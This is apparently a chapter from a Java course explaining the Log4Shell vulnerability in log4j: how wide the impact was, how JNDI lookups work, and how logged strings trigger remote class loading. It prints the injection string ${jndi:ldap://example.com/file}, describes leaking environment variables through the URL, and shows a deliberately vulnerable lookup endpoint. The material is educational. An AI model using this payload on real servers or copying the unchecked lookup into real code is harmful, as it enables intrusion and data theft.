7.1 Scandal
And of course, it is impossible not to tell about the story that happened quite recently - at the end of 2021.
The US Cybersecurity and Infrastructure Protection Agency (CISA) said the problem Log4Shell
is one of the most serious vulnerabilities in history. Yes, we are talking about our favorite library log4j
.
Our cozy little library log4j
and the biggest vulnerability in history ? Intrigued? Then listen.
7.2 Scale of the disaster
The discovery of a critical vulnerability Log4Shell
(code CVE-2021-44228) was announced on December 9, 2021 by Lunasec security experts. Experts from the Apache Security Team Java community have verified this information and published a list of vulnerable Java libraries. The list was just huge.
If a Java project used a library log4j
, then it could be hacked fairly easily. And given that almost all server software is written in Java
the log4j
most popular java logger, according to security experts, the vulnerability affected 93% of corporate cloud environments. Including the likes of Amazon AWS, Microsoft Azure, Google Cloud, Cloudflare, iCloud, Minecraft, Steam and many more
Moreover, the vulnerability affected not only server software, but also many Java applications, as well as hardware manufacturers. For example, Intel published a list of 32 hackable programs: SDKs, server maintenance systems, Linux tools.
Nvidia also posted a security issue report mentioning DGX servers and NetQ tools. A number of updates were urgently released by Apple and Microsoft.
Roughly speaking, one line in the address bar of a student's browser puts the server if this line is eaten by the logger (on many servers, everything is logged HTTP-requests
).
After analyzing the code, it turned out that the vulnerability had been sitting in the library since 2013, but they noticed only now. And when they began to dig deeper, they discovered an abyss, the bottom of which is not visible at all.
7.3 The most serious vulnerability in history
Back in December 2021, the US Cybersecurity and Infrastructure Protection Agency (CISA) stated that Log4Shell
it is one of the most serious vulnerabilities in history .
Many other experts express a similar opinion . Everyone knows about this vulnerability, and hackers of all ages are already using it to steal personal data and other types of attacks on various organizations. In the future, we are waiting for a wave of massive hacks and data leaks.
The scale of the disaster can be gauged even by the fact that there is a separate site with memes about Log4j , and every day there are new pictures.
This problem has been with us for a long time. A security hole in millions if not hundreds of millions of computer systems. All old software needs to be updated and at least replace this library there. But in most cases, no one even knows which libraries and which versions are used in their software.
In general, we expect a sharp increase in the salaries of computer security specialists.
7.4 Nature of vulnerability
To understand the essence of the vulnerability, you need to understand how large server systems are arranged. Often such server applications are broken into different services that are located on different servers. And the JNDI service helps them interact.
Java Naming and Directory Interface (JNDI) is Java API
to look up objects/services by name. These objects can be stored in various naming services or directories such as Remote Method Invocation (RMI), Common Object Request Broker Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS).
Working with it is very simple - it is a simple one Java API
that takes only one string parameter - the name of the service. With it, you can contact any service and ask him to do something and / or send some data. For example, string ${jndi:ldap://example.com/file}
will load data from this URL
specified in the string.
If the parameter comes from an untrusted source, it can lead to remote class loading and third-party code execution . What happens in the case of Log4j
. The attacker simply directs the victim's Java application to the malicious one rmi/ldap/corba-server
and receives a malicious object in response.
Technically, the problem here is not in log4j
the library itself, but in the security settings when working with JNDI-service
. You always need to check what kind of string we pass to InitialContext.lookup()
.
Vulnerable example JNDI-applications
:
@RequestMapping("/lookup")
@Example(uri = {"/lookup?name=java:comp/env"})
public Object lookup(@RequestParam String name) throws Exception{
return new javax.naming.InitialContext().lookup(name);
}
7.5 Too smart library
And where log4j
do you ask? The thing is that its developers wanted to make working with it as comfortable as possible and added smart logging to it. Here's how it works:
It all started with the fact that log messages allowed you to set a template where data was substituted, for example:
log.debug(“User {user} has {count} friends”, user, count);
The old version without data substitution looked like this:
log.debug( “User “+user +” has “+ count +” friends”);
In 2013, the substitution of smart prefixes specified by the view template was also added to the library ${prefix:name}
. For example, the string “${java:version}”
will be converted to «Java version 1.7.0_67»
. Oh how convenient.
Among the recognized expressions are ${jndi:<lookup>}
where after the jndi protocol you can specify a search through LDAP
: arbitrary URL-address
can be queried and loaded as object data Java
.
This is a standard problem of the whole approach JDK
: it automatically deserializes an object, a link to which can be set in the form of a url. In this case, not only the data of the object is loaded from the remote resource, but also the code of its class.
The hack looks like this:
- Downloading a file with malicious code
- File contains serialized
Java an object
(and its class) - The class is loading
Java-machine
- An object of a malicious class is created
- The object's constructor is called
- Both constructor and static initialization allow malicious class code to be executed
log4j
If there is something like in the line that is being logged ${jndi:ldap://example.com/file}
, then log4j
it will download data from this URL-address
when connecting to the Internet . By entering a string that is logged, an attacker can download and execute malicious code hosted on a public URL-address
.
Even if data execution is disabled, an attacker can obtain data, such as secret environment variables, by placing it in a URL-address
, which will replace it and send it to the attacker's server.
The good news is that the problem was quickly fixed in the library .
The bad news is that millions of servers around the world are still running the old version of this library ...
GO TO FULL VERSION